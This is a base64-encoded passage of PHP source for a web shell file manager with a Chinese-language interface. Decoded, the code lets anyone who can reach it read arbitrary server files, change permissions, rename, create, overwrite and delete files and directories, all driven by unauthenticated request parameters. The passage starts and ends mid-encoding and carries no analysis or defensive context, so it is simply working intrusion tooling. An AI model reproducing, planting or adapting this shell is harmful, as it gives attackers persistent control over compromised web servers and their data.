HI+JzsKICAgIGlmKGlzc2V0KCRfR0VUWydmaWxlc3JjJ10pKXsKICAgICAgICBlY2hvICI8dHI+PHRkPjxjZW50ZXI+5b2T5YmN5paH5Lu2IDogIjsKICAgICAgICBlY2hvICRfR0VUWydmaWxlc3JjJ107CiAgICAgICAgZWNobyAnPC9jZW50ZXI+PC90cj48L3RkPjwvdGFibGU+PGJyIC8+JzsKICAgICAgICBlY2hvKCcgPHRleHRhcmVhIHN0eWxlPSJ3aWR0aDogMTAwJTtoZWlnaHQ6IDQwMHB4OyIgcmVhZG9ubHk+ICcuaHRtbHNwZWNpYWxjaGFycyhmaWxlX2dldF9jb250ZW50cygkX0dFVFsnZmlsZXNyYyddKSkuJzwvdGV4dGFyZWE+Jyk7CiAgICB9Ci8vRW1wZXR5CiAgICBlbHNlaWYoaXNzZXQoJF9HRVRbJ29wdGlvbiddKSAmJiAkX0dFVFsnb3B0J10gIT0gJ2RlbGV0ZScpewovLyBlY2hvICc8L3RhYmxlPjxiciAvPjxjZW50ZXI+Jy4kX1BPU1RbJ3BhdGgnXS4nPGJyIC8+PGJyIC8+JzsKICAgICAgICBlY2hvICc8L3RhYmxlPjxiciAvPjxjZW50ZXI+JzsKLy9DaG1vZAogICAgICAgIGlmKCRfR0VUWydvcHQnXSA9PSAnY2htb2QnKXsKICAgICAgICAgICAgaWYoaXNzZXQoJF9QT1NUWydwZXJtJ10pKXsKICAgICAgICAgICAgICAgICRuZXdfcGVybV9vID0gJF9QT1NUWydwZXJtJ107CgogICAgICAgICAgICAgICAgaWYoc3RybGVuKCRuZXdfcGVybV9vKTw9MykgJG5ld19wZXJtX289c3RyX3BhZCgkbmV3X3Blcm1fbywzLCc2JyxTVFJfUEFEX0xFRlQpOwogICAgICAgICAgICAgICAgJG5ld19wZXJtX289aW50dmFsKHN0cl9wYWQoJG5ld19wZXJtX28sNCwnMCcsU1RSX1BBRF9MRUZUKSw4KTsKCiAgICAgICAgICAgICAgICBpZihjaG1vZCgkX1BPU1RbJ3BhdGgnXSwkbmV3X3Blcm1fbykpewogICAgICAgICAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJncmVlbiI+5pu05pS55p2D6ZmQ5oiQ5Yqf77yBIDwvZm9udD48YnIgLz4nOwogICAgICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICAgICAgZWNobyAnPGZvbnQgY29sb3I9InJlZCI+5pu05pS55p2D6ZmQ6ZSZ6K+v77yBIDwvZm9udD48YnIgLz4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CgogICAgICAgICAgICAkaGVsbCA9ICRfR0VUWydwYXRoJ107CiAgICAgICAgICAgICR5ZWFoID0gJF9HRVRbJ25hbWUnXTsKICAgICAgICAgICAgJHBhdGMgPSAiJGhlbGwvJHllYWgiOwoKICAgICAgICAgICAgZWNobyAnPGZvcm0gbWV0aG9kPSJQT1NUIj48YnI+CuW9k+WJjeaWh+S7tiA6ICcuJHBhdGMuJzxicj48YnI+5p2D6ZmQLS0tLScuc3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRwYXRjKSwxMCw4KSwtNCkuJzxicj48YnI+Cuiuvue9ruaWsOadg+mZkCA6IDxpbnB1dCBuYW1lPSJwZXJtIiB0eXBlPSJ0ZXh0IiBzaXplPSI0IiB2YWx1ZT0iJy5zdWJzdHIoc3ByaW50ZignJW8nLCBmaWxlcGVybXMoJHBhdGMpKSwgLTQpLiciIC8+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhdGgiIHZhbHVlPSInLiRwYXRjLiciPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJvcHQiIHZhbHVlPSJjaG1vZCI+CjxpbnB1dCB0eXBlPSJzdWJtaXQiIC8+CjwvZm9ybT4KPGJyPgo8YSBocmVmPSI/QVJSQVk9Jy4kQVJSQVkuJyZwYXRoPScuJGhlbGwuJyIgc3R5bGU9ImRpc3BsYXk6YmxvY2s7IHdpZHRoOjEwMCU7IiB0aXRsZT0i5Y+N5ZueIj7lj43lm548L2E+Cic7CgogICAgICAgIH0KLy8KICAgICAgICBlbHNlaWYoJF9HRVRbJ29wdCddID09ICdidHcnKXsKICAgICAgICAgICAgJGN3ZCA9ICRfR0VUWydwYXRoJ107CgogICAgICAgICAgICBlY2hvICc8Zm9ybSBhY3Rpb249Ij9BUlJBWT0nLiRBUlJBWS4nJm9wdGlvbiZwYXRoPScuJGN3ZC4nJm9wdD1kZWxldGUmdHlwZT1idWF0IiBtZXRob2Q9IlBPU1QiPgrmlrDnm67lvZXlkI0gOiA8aW5wdXQgbmFtZT0ibmFtZSIgdHlwZT0idGV4dCIgc2l6ZT0iMjAiIHZhbHVlPSJGb2xkZXIiIC8+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhdGgiIHZhbHVlPSInLiRjd2QuJyI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Im9wdCIgdmFsdWU9ImRlbGV0ZSI+CjxpbnB1dCB0eXBlPSJzdWJtaXQiIC8+CjwvZm9ybT4nOwogICAgICAgIH0KLy9SZW5hbWUgZmlsZQogICAgICAgIGVsc2VpZigkX0dFVFsnb3B0J10gPT0gJ3JlbmFtZScpewogICAgICAgICAgICBpZihpc3NldCgkX1BPU1RbJ25ld25hbWUnXSkpewogICAgICAgICAgICAgICAgaWYocmVuYW1lKCRfUE9TVFsncGF0aCddLCRwYXRoLicvJy4kX1BPU1RbJ25ld25hbWUnXSkpewogICAgICAgICAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJncmVlbiI+6YeN5ZG95ZCN5oiQ5YqfISA6KTwvZm9udD48YnIgLz48YnIgLz4nOwogICAgICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICAgICAgZWNobyAnPGZvbnQgY29sb3I9InJlZCI+6YeN5ZG95ZCN5aSx6LSlISA6KCA8L2ZvbnQ+PGJyIC8+PGJyIC8+JzsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgICRfUE9TVFsnbmFtZSddID0gJF9QT1NUWyduZXduYW1lJ107CiAgICAgICAgICAgIH0KICAgICAgICAgICAgJGhlbGwgPSAkX0dFVFsncGF0aCddOwogICAgICAgICAgICAkeWVhaCA9ICRfR0VUWyduYW1lJ107CiAgICAgICAgICAgICRwYXRjID0gIiRoZWxsLyR5ZWFoIjsKICAgICAgICAgICAgJG5ldyA9ICRfUE9TVFsnbmV3bmFtZSddOwoKICAgICAgICAgICAgZWNobyAnPGZvcm0gbWV0aG9kPSJQT1NUIj4K5paw5ZCN56ewIDogPGlucHV0IG5hbWU9Im5ld25hbWUiIHR5cGU9InRleHQiIHNpemU9IjIwIiB2YWx1ZT0iJy4kbmV3LiciIC8+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhdGgiIHZhbHVlPSInLiRwYXRjLiciPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJvcHQiIHZhbHVlPSJyZW5hbWUiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiAvPjxicj48YnI+CjxpbnB1dCB0eXBlPSJidXR0b24iIHZhbHVlPSLlj43lm54iIG9uQ2xpY2s9ImphdmFzY3JpcHQ6bG9jYXRpb24uaHJlZj1cJz9BUlJBWT0nLiRBUlJBWS4nJnBhdGg9Jy4kaGVsbC4nXCciPgo8L2Zvcm0+JzsKICAgICAgICB9Ci8vRmlsZSBiYXJ1CiAgICAgICAgZWxzZWlmKCRfR0VUWydvcHQnXSA9PSAnYmFydScpewoKICAgICAgICAgICAgJGhlbGwgPSAkX0dFVFsncGF0aCddOwogICAgICAgICAgICAkeWVhaCA9ICRfR0VUWyduYW1lJ107CiAgICAgICAgICAgICRwYXRjID0gIiRoZWxsLyR5ZWFoIjsKICAgICAgICAgICAgJG5ldyA9IGVtcHR5KCRfUE9TVFsnbmV3bmFtZSddKT8kX1BPU1RbJ25nYXJhbjEnXTokX1BPU1RbJ25ld25hbWUnXTsKICAgICAgICAgICAgJGF6eiA9ICRfUE9TVFsncGF0aCddOwogICAgICAgICAgICAkbmV3eiA9ICRhenouIi8iLiRuZXc7CiAgICAgICAgICAgICRuZXdfZmllbCA9ICRoZWxsLicvJy4kX1BPU1RbJ25nYXJhbjEnXTsKICAgICAgICAgICAgaWYoIWVtcHR5KCRfUE9TVFsnbmdhcmFuMSddKSkgZWNobyAi5q2j5Zyo5paw5bu65paH5Lu277yaeyRuZXdfZmllbH08YnI+PGJyPiI7CiAgICAgICAgICAgIGlmKGlzc2V0KCRfUE9TVFsnc3JjJ10pKXsKICAgICAgICAgICAgICAgICRmcCA9IGZvcGVuKCRfUE9TVFsncGF0aCddLCd3Jyk7CiAgICAgICAgICAgICAgICBpZihmd3JpdGUoJGZwLCRfUE9TVFsnc3JjJ10pKXsKICAgICAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0iZ3JlZW4iPuaWsOW7uuaWh+S7tuaIkOWKnyBbICcuJGF6ei4nIF08L2ZvbnQ+PGJyIC8+PGJyIC8+JzsKICAgICAgICAgICAgICAgIH1lbHNlewogICAgICAgICAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJyZWQiPuaWsOW7uuaWh+S7tuWksei0pSA+Oig8L2ZvbnQ+PGJyIC8+PGJyIC8+JzsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIGZjbG9zZSgkZnApOwogICAgICAgICAgICB9CgogICAgICAgICAgICBlY2hvICc8Zm9ybSBtZXRob2Q9IlBPU1QiPiDmlrDmlofku7blkI0gOiA8aW5wdXQgbmFtZT0ibmdhcmFuMSIgdHlwZT0idGV4dCIgc2l6ZT0iMjAiIHZhbHVlPSInLiRuZXcuJyIgLz48aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJuZ2FyYW4iIC8+PC9mb3JtPjxicj4gJzsKCiAgICAgICAgICAgICRobyA9ICRfUE9TVFsnbmdhcmFuMSddOwoKICAgICAgICAgICAgaWYoaXNzZXQoJF9QT1NUWyduZ2FyYW4nXSkpewogICAgICAgICAgICAgICAgZWNobyAnPGZvcm0gbWV0aG9kPSJQT1NUIj4KPHRleHRhcmVhIGNvbHM9ODAgcm93cz0yMCBuYW1lPSJzcmMiPicuaHRtbHNwZWNpYWxjaGFycyhmaWxlX2dldF9jb250ZW50cygkcGF0YykpLic8L3RleHRhcmVhPjxiciAvPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJwYXRoIiB2YWx1ZT0iJy4kaGVsbC4nLycuJGhvLiciPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJvcHQiIHZhbHVlPSJlZGl0Ij4KPGlucHV0IHR5cGU9InN1Ym1pdCIgIC8+CjwvZm9ybT4nOwogICAgICAgICAgICB9CiAgICAgICAgfQovL0VkaXRlZCBmaWxlCiAgICAgICAgZWxzZWlmKCRfR0VUWydvcHQnXSA9PSAnZWRpdCcpewogICAgICAgICAgICBpZihpc3NldCgkX1BPU1RbJ3NyYyddKSl7CiAgICAgICAgICAgICAgICAkZnAgPSBmb3BlbigkX1BPU1RbJ3BhdGgnXSwndycpOwogICAgICAgICAgICAgICAgaWYoZndyaXRlKCRmcCwkX1BPU1RbJ3NyYyddKSl7CiAgICAgICAgICAgICAgICAgICAgZWNobyAnPGZvbnQgY29sb3I9ImdyZWVuIj7nvJbovpHmiJDlip/vvIEgPC9mb250PjxiciAvPjxiciAvPic7CiAgICAgICAgICAgICAgICB9ZWxzZXsKICAgICAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0icmVkIj7nvJbovpHlpLHotKXvvIE8L2ZvbnQ+PGJyIC8+PGJyIC8+JzsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIGZjbG9zZSgkZnApOwogICAgICAgICAgICB9CiAgICAgICAgICAgICRoZWxsID0gJF9HRVRbJ3BhdGgnXTsKICAgICAgICAgICAgJHllYWggPSAkX0dFVFsnbmFtZSddOwogICAgICAgICAgICAkcGF0YyA9ICIkaGVsbC8keWVhaCI7CiAgICAgICAgICAgIGVjaG8gJzxmb3JtIG1ldGhvZD0iUE9TVCI+Cjx0ZXh0YXJlYSBjb2xzPTgwIHJvd3M9MjAgbmFtZT0ic3JjIj4nLmh0bWxzcGVjaWFsY2hhcnMoZmlsZV9nZXRfY29udGVudHMoJHBhdGMpKS4nPC90ZXh0YXJlYT48YnIgLz4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0icGF0aCIgdmFsdWU9IicuJHBhdGMuJyI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Im9wdCIgdmFsdWU9ImVkaXQiPjxicj4KPGlucHV0IHR5cGU9InN1Ym1pdCIgIC8+Cjxicj4KPGJyPgo8aW5wdXQgdHlwZT0iYnV0dG9uIiB2YWx1ZT0i5Y+N5ZueIiBvbkNsaWNrPSJqYXZhc2NyaXB0OmxvY2F0aW9uLmhyZWY9XCc/QVJSQVk9Jy4kQVJSQVkuJyZwYXRoPScuJGhlbGwuJ1wnIj4KCjwvZm9ybT4nOwogICAgICAgIH0KICAgICAgICBlY2hvICc8L2NlbnRlcj4nOwogICAgfWVsc2V7CiAgICAgICAgZWNobyAnPC90YWJsZT48YnIgLz48Y2VudGVyPic7Ci8vRGVsZXRlIGRpciBhbmQgZmlsZQogICAgICAgIGlmKGlzc2V0KCRfR0VUWydvcHRpb24nXSkgJiYgJF9HRVRbJ29wdCddID09ICdkZWxldGUnKXsKCiAgICAgICAgICAgICRoZWxsID0gJF9HRVRbJ3BhdGgnXTsKICAgICAgICAgICAgJHllYWggPSAkX0dFVFsnbmFtZSddOwogICAgICAgICAgICAkcGF0YyA9ICIkaGVsbC8keWVhaCI7CgovL0RlbGV0ZSBkaXIKICAgICAgICAgICAgaWYoJF9HRVRbJ3R5cGUnXSA9PSAnZGlyJyl7CgogICAgICAgICAgICAgICAgaWYocm1kaXIoJHBhdGMpKXsKICAgICAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0iZ3JlZW4iPuWIoOmZpOaIkOWKn++8gTwvZm9udD48YnIgLz4nOwogICAgICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICAgICAgZWNobyAnPGZvbnQgY29sb3I9InJlZCMiPuWIoOmZpOWksei0pSE+Oig8L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgfQovL2J1YXQgZm9sZGVyCiAgICAgICAgICAgIGlmKCRfR0VUWyd0eXBlJ10gPT0gJ2J1YXQnKXsKICAgICAgICAgICAgICAgICRoYWFhID0gJF9QT1NUWydwYXRoJ107CiAgICAgICAgICAgICAgICAkaGVlZSA9ICRfUE9TVFsnbmFtZSddOwogICAgICAgICAgICAgICAgJGhvb28gPSAiJGhhYWEvJGhlZWUiOwogICAgICAgICAgICAgICAgJG5ldyA9ICRoYWFhLicvJy5odG1sc3BlY2lhbGNoYXJzKCRoZWVlKTsKICAgICAgICAgICAgICAgIGlmKCFta2RpcigkbmV3KSl7CiAgICAgICAgICAgICAgICAgICAgZWNobyAnPGZvbnQgY29sb3I9InJlZCI+5paw5bu655uu5b2V5aSx6LSlITwvZm9udD48YnIgLz4nOwogICAgICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICAgICAgZWNobyAnPGZvbnQgY29sb3I9ImdyZWVuIj7mlrDlu7rnm67lvZXmiJDlip8hID46KTwvZm9udD48YnIgLz4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9Ci8vRGVsZXRlIGZpbGUKICAgICAgICAgICAgZWxzZWlmKCRfR0VUWyd0eXBlJ10gPT0gJ2ZpbGUnKXsKCiAgICAgICAgICAgICAgICAkaGVsbCA9ICRfR0VUWydwYXRoJ107CiAgICAgICAgICAgICAgICAkeWVhaCA9ICRfR0VUWyduYW1lJ107CiAgICAgICAgICAgICAgICAkcGF0YyA9ICIkaGVsbC8keWVhaCI7CgogICAgICAgICAgICAgICAgaWYodW5saW5rKCRwYXRjKSl7CiAgICAgICAgICAgICAgICAgICAgZWNobyAnPGZvbnQgY29sb3I9ImdyZWVuIj7mlofku7bliKDpmaTmiJDlip88L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgICAgIH1lbHNlewogICAgICAgICAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJyZWQiPuaWh+S7tuWIoOmZpOWksei0pTwvZm9udD48YnIgLz4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIGVjaG8gJzwvY2VudGVyPic7CiAgICAgICAgJHNjYW5kaXIgPSBzY2FuZGlyKCRwYXRoKTsKICAgICAgICAkcGEgPSBnZXRjd2QoKTsKICAgICAgICBlY2hvICcgPGRpdiBpZD0iY29udGVudCI+PHRhYmxlIHdpZHRoPSIxMDAlIiBjbGFzcz0idGFibGVfaG9tZSIgYm9yZGVyPSIwIiBjZWxscGFkZGluZz0iMyIgY2VsbHNwYWNpbmc9IjEiIGFsaWduPSJjZW50ZXIiPgogCjx0cj4KPHRoIGNsYXNzPXRoX2hvbWUgc3R5bGU9ImJhY2tncm91bmQ6YmxhY2s7Y29sb3I6I2ZmZjsiPjxjZW50ZXI+5ZCN56ewPC9jZW50ZXI+PC90aD4KPHRoIGNsYXNzPXRoX2hvbWUgc3R5bGU9ImJhY2tncm91bmQ6YmxhY2s7Y29sb3I6I2ZmZjsiID48Y2VudGVyPuWkp+WwjzwvY2VudGVyPjwvdGg+Cjx0aCBjbGFzcz10aF9ob21lIHN0eWxlPSJiYWNrZ3JvdW5kOmJsYWNrO2NvbG9yOiNmZmY7IiA+PGNlbnRlcj7mnYPpmZA8L2NlbnRlcj48L3RoPgo8dGggY2xhc3M9dGhfaG9tZSBzdHlsZT0iYmFja2dyb3VuZDpibGFjaztjb2xvcjojZmZmOyIgPjxjZW50ZXI+5pON5L2c6YCJ6aG5PC9jZW50ZXI+PC90aD4KPC90cj4KCgogPHRyPgo8dGQgY2xhc3M9InRkX2hvbWUiIGFsaWduPSJjZW50ZXIiPgo8YSBocmVmPSI/QVJSQVk9Jy4kQVJSQVkuJyZwYXRoPScuZGlybmFtZSgkcGF0aCkuJyIgc3R5bGU9ImRpc3BsYXk6YmxvY2s7IHdpZHRoOjEwMCU7IiB0aXRsZT0i5LiK5LiA6aG1Ij7kuIrkuIDpobU8L2E+CjwvdGQ+PHRkIGNsYXNzPXRkX2hvbWUgYWxpZ249Y2VudGVyPlNpemU8L3RkPiA8dGQgY2xhc3M9dGRfaG9tZSBhbGlnbj1jZW50ZXI+Q2htb2Q8L3RkPiA8dGQgY2xhc3M9dGRfaG9tZSBhbGlnbj1jZW50ZXI+IDxhIGhyZWY9Ij9vcHRpb24mQVJSQVk9Jy4kQVJSQVkuJyZwYXRoPScuJHBhdGguJyZvcHQ9YmFydSZuYW1lPW5ldy5waHAiPisg5paw5bu65paH5Lu2PC9hPiB8IDxhIGhyZWY9Ij9vcHRpb24mQVJSQVk9Jy4kQVJSQVkuJyZwYXRoPScuJHBhdGguJyZvcHQ9YnR3JnR5cGU9ZGlyIj4rIOaWsOW7uuebruW9lTwvYT4gPC90ZD48L3RyPgonOwoKICAgICAgICBmb3JlYWNoKCRzY2FuZGlyIGFzICRkaXIpewogICAgICAgICAgICBpZighaXNfZGlyKCIkcGF0aC8kZGlyIikgfHwgJGRpciA9PSAnLicgfHwgJGRpciA9PSAnLi4nKSBjb250aW51ZTsKICAgICAgICAgICAgZWNobyAiCjx0cj4KPHRkIGNsYXNzPXRkX2hvbWU+IDxpbWcgc3JjPSdkYXRhOmltYWdlL3BuZztiYXNlNjQsUjBsR09EbGhFd0FRQUxNQUFBQUFBUC8vLzV5Y0FNN09ZLy8vblAvL3p2L09uUGYzOS8vLy93QUFBQUFBQUFBQUFBQUFBQUFBQUFBQSIuIkFBQUFBQ0g1QkFFQUFBZ0FMQUFBQUFBVEFCQUFBQVJSRU1sSnE3MDQ2eXA2QnhzaUhFVkJFQUtZQ1VQckRwN0hsWFJkRW9NcUNlYnAiLiIvNFljaGZmekdRaEg0WVJZUEIyRE9sSFBpS3dxZDFQcTh5clZWZzNRWWVINVJZSzVySmZhRlVVQTN2QjRmQklCQURzPSc+IDxhIGhyZWY9XCI/QVJSQVk9eyRBUlJBWX0mcGF0aD0kcGF0aC8kZGlyXCI+JGRpcjwvYT48L3RkPgo8dGQgY2xhc3M9dGRfaG9tZSA+PGNlbnRlcj5ESVI8L2NlbnRlcj48L3RkPgo8dGQgY2xhc3M9dGRfaG9tZSBhbGlnbj1jZW50ZXI+CjxhIGhyZWY9XCI/b3B0aW9uJkFSUkFZPXskQVJSQVl9JnBhdGg9JHBhdGgmb3B0PWNobW9kJnR5cGU9ZGlyJm5hbWU9JGRpclwiIHRpdGxlPSfmnYPpmZDorr7nva4nPgoiOwogICAgICAgICAgICBpZihpc193cml0YWJsZSgiJHBhdGgvJGRpciIpKSBlY2hvICc8Zm9udCBjb2xvcj0iZ3JlZW4iPic7CiAgICAgICAgICAgIGVsc2VpZighaXNfcmVhZGFibGUoIiRwYXRoLyRkaXIiKSkgZWNobyAnPGZvbnQgY29sb3I9InJlZCI+JzsKICAgICAgICAgICAgZWNobyBqdWVqaWFuZ19wZXJtcygiJHBhdGgvJGRpciIpOwogICAgICAgICAgICBpZihpc193cml0YWJsZSgiJHBhdGgvJGRpciIpIHx8ICFpc19yZWFkYWJsZSgiJHBhdGgvJGRpciIpKSBlY2hvICc8L2ZvbnQ+JzsKCiAgICAgICAgICAgIGVjaG8gIgo8L2E+CjwvdGQ+CgoKPHRkIGNsYXNzPXRkX2hvbWUgPjxjZW50ZXI+CjxhIGhyZWY9XCI/b3B0aW9uJkFSUkFZPXskQVJSQVl9JnBhdGg9JHBhdGgmb3B0PXJlbmFtZSZ0eXBlPWRpciZuYW1lPSRkaXJcIj7ph43lkb3lkI08L2E+CjxhIGhyZWY9XCJqYXZhc2NyaXB0OmlmKGNvbmZpcm0oJ+ehruWunuimgeWIoOmZpOWQlz8nKSlsb2NhdGlvbj0nP29wdGlvbiZBUlJBWT17JEFSUkFZfSZwYXRoPXskcGF0aH0mb3B0PWRlbGV0ZSZ0eXBlPWRpciZuYW1lPXskZGlyfSdcIj7liKDpmaQ8L2E+CjwvY2VudGVyPjwvdGQ+CjwvdHI+IjsKICAgICAgICB9CiAgICAgICAgZWNobyAnPGJyPic7CiAgICAgICAgZm9yZWFjaCgkc2NhbmRpciBhcyAkZmlsZSl7CiAgICAgICAgICAgIGlmKCFpc19maWxlKCIkcGF0aC8kZmlsZSIpKSBjb250aW51ZTsKICAgICAgICAgICAgJHNpemUgPSBmaWxlc2l6ZSgiJHBhdGgvJGZpbGUiKS8xMDI0OwogICAgICAgICAgICAkc2l6ZSA9IHJvdW5kKCRzaXplLDMpOwogICAgICAgICAgICBpZigkc2l6ZSA+PSAxMDI0KXsKICAgICAgICAgICAgICAgICRzaXplID0gcm91bmQoJHNpemUvMTAyNCwyKS4nIE1CJzsKICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICAkc2l6ZSA9ICRzaXplLicgS0InOwogICAgICAgICAgICB9CgoKICAgICAgICAgICAgZWNobyAiPHRyPgo8dGQgY2xhc3M9dGRfaG9tZSA+IDxpbWcgc3JjPSdkYXRhOmltYWdlL3BuZztiYXNlNjQsaVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQUF3QUFBQVFDQVlBQUFBaVlaNEhBQUFBQ1hCSVdYTUFBQXNUQUFBTEV3RUFtcHdZQUFBS1RXbERRMUJRYUc5MGIzTm9iM0FnU1VORElIQnliMlpwYkdVQUFIamFuVk4zV0pQM0ZqN2Y5MlVQVmtMWThMR1hiSUVBSWlPc0NNZ1FXYUlRa2dCaGhCQVNRTVdGaUFwV0ZCVVJuRWhWeElMVkNraWRpT0tnS0xoblFZcUlXb3RWWERqdUg5eW50WDE2NyszdCs5Zjd2T2VjNS96T2VjOFBnQkVTSnBIbW9tb0FPVktGUERyWUg0OVBTTVRKdllBQ0ZVamdCQ0FRNXN2Q1p3WEZBQUR3QTNsNGZuU3dQL3dCcjI4QUFnQncxUzRrRXNmaC80TzZVQ1pYQUNDUkFPQWlFdWNMQVpCU0FNZ3VWTWdVQU1nWUFMQlRzMlFLQUpRQUFHeDVmRUlpQUtvTkFPejBTVDRGQU5pcGs5d1hBTmlpSEtrSUFJMEJBSmtvUnlRQ1FMc0FZRldCVWl3Q3dNSUFvS3hBSWk0RXdLNEJnRm0yTWtjQ2dMMEZBSGFPV0pBUFFHQUFnSmxDTE13QUlEZ0NBRU1lRTgwRElFd0RvRERTditDcFgzQ0Z1RWdCQU1ETGxjMlhTOUl6RkxpVjBCcDM4dkRnNGlIaXdteXhRbUVYS1JCbUNlUWluSmViSXhOSTV3Tk16Z3dBQUJyNTBjSCtPRCtRNStiazRlWm01Mnp2OU1XaS9tdndieUkrSWZIZi9yeU1BZ1FBRUU3UDc5cGY1ZVhXQTNESEFiQjF2MnVwV3dEYVZnQm8zL2xkTTlzSm9Gb0swSHI1aTNrNC9FQWVucUZReUR3ZEhBb0xDKzBsWXFHOU1PT0xQdjh6NFcvZ2kzNzIvRUFlL3R0NjhBQnhta0NacmNDamcvMXhZVzUycmxLTzU4c0VRakZ1OStjai9zZUZmLzJPS2RIaU5MRmNMQldLOFZpSnVGQWlUY2Q1dVZLUlJDSEpsZUlTNlg4eThSK1cvUW1UZHcwQXJJWlB3RTYyQjdYTGJNQis3Z0VDaXc1WTBuWUFRSDd6TFl3YUM1RUFFR2MwTW5uM0FBQ1R2L21QUUNzQkFNMlhwT01BQUx6b0dGeW9sQmRNeGdnQUFFU2dnU3F3UVFjTXdSU3N3QTZjd1IyOHdCY0NZUVpFUUF3a3dEd1FRZ2JrZ0J3S29SaVdRUmxVd0RyWUJMV3dBeHFnRVpyaEVMVEJNVGdONStBU1hJSHJjQmNHWUJpZXdoaThoZ2tFUWNnSUUyRWhPb2dSWW83WUlzNElGNW1PQkNKaFNEU1NnS1FnNllnVVVTTEZ5SEtrQXFsQ2FwRmRTQ1B5TFhJVU9ZMWNRUHFRMjhnZ01vcjhpcnhITVpTQnNsRUQxQUoxUUxtb0h4cUt4cUJ6MFhRMEQxMkFscUpyMFJxMEhqMkF0cUtuMFV2b2RYUUFmWXFPWTREUk1RNW1qTmxoWEl5SFJXQ0pXQm9teHhaajVWZzFWbzgxWXgxWU4zWVZHOENlWWU4SUpBS0xnQlBzQ0Y2RUVNSnNncENRUjFoTVdFT29KZXdqdEJLNkNGY0pnNFF4d2ljaWs2aFB0Q1Y2RXZuRWVHSTZzWkJZUnF3bTdpRWVJWjRsWGljT0UxK1RTQ1FPeVpMa1Rnb2hKWkF5U1F0SmEwamJTQzJrVTZRKzBoQnBuRXdtNjVCdHlkN2tDTEtBckNDWGtiZVFENUJQa3Z2SncrUzNGRHJGaU9KTUNhSWtVcVNVRWtvMVpUL2xCS1dmTWtLWm9LcFJ6YW1lMUFpcWlEcWZXa2x0b0haUUwxT0hxUk0wZFpvbHpac1dROHVrTGFQVjBKcHBaMm4zYUMvcGRMb0ozWU1lUlpmUWw5SnI2QWZwNSttRDlIY01EWVlOZzhkSVlpZ1pheGw3R2FjWXR4a3ZtVXltQmRPWG1jaFVNTmN5RzVsbm1BK1liMVZZS3ZZcWZCV1J5aEtWT3BWV2xYNlY1NnBVVlhOVlA5VjVxZ3RVcTFVUHExNVdmYVpHVmJOUTQ2a0oxQmFyMWFrZFZidXBOcTdPVW5kU2oxRFBVVitqdmwvOWd2cGpEYktHaFVhZ2hraWpWR08zeGhtTklSYkdNbVh4V0VMV2NsWUQ2eXhybUUxaVc3TDU3RXgyQmZzYmRpOTdURk5EYzZwbXJHYVJacDNtY2MwQkRzYXg0UEE1Mlp4S3ppSE9EYzU3TFFNdFB5MngxbXF0WnExK3JUZmFldHErMm1MdGN1MFc3ZXZhNzNWd25VQ2RMSjMxT20wNjkzVUp1amE2VWJxRnV0dDF6K28rMDJQcmVla0o5Y3IxRHVuZDBVZjFiZlNqOVJmcTc5YnYwUjgzTURRSU5wQVpiREU0WS9ETWtHUG9hNWhwdU5Id2hPR29FY3RvdXBIRWFLUFJTYU1udUNidWgyZmpOWGdYUG1hc2J4eGlyRFRlWmR4clBHRmlhVExicE1Ta3hlUytLYzJVYTVwbXV0RzAwM1RNek1nczNLellyTW5zampuVm5HdWVZYjdadk52OGpZV2xSWnpGU29zMmk4ZVcycFo4eXdXV1RaYjNySmhXUGxaNVZ2VlcxNnhKMWx6ckxPdHQxbGRzVUJ0WG13eWJPcHZMdHFpdG02M0VkcHR0M3hUaUZJOHAwaW4xVTI3YU1lejg3QXJzbXV3RzdUbjJZZllsOW0zMnp4M01IQklkMWp0ME8zeHlkSFhNZG14d3ZPdWs0VFREcWNTcHcrbFhaeHRub1hPZDh6VVhwa3VReXhLWGRwY1hVMjJuaXFkdW4zckxsZVVhN3JyU3RkUDFvNXU3bTl5dDJXM1UzY3c5eFgyciswMHVteHZKWGNNOTcwSDA4UGRZNG5ITTQ1Mm5tNmZDODVEbkwxNTJYbGxlKzcwZVQ3T2NKcDdXTUczSTI4UmI0TDNMZTJBNlBqMWwrczdwQXo3R1BnS2ZlcCtIdnFhK0l0ODl2aU4rMW42WmZnZjhudnM3K3N2OWovaS80WG55RnZGT0JXQUJ3UUhsQWIyQkdvR3pBMnNESHdTWkJLVUhOUVdOQmJzR0x3dytGVUlNQ1ExWkgzS1RiOEFYOGh2NVl6UGNaeXlhMFJYS0NKMFZXaHY2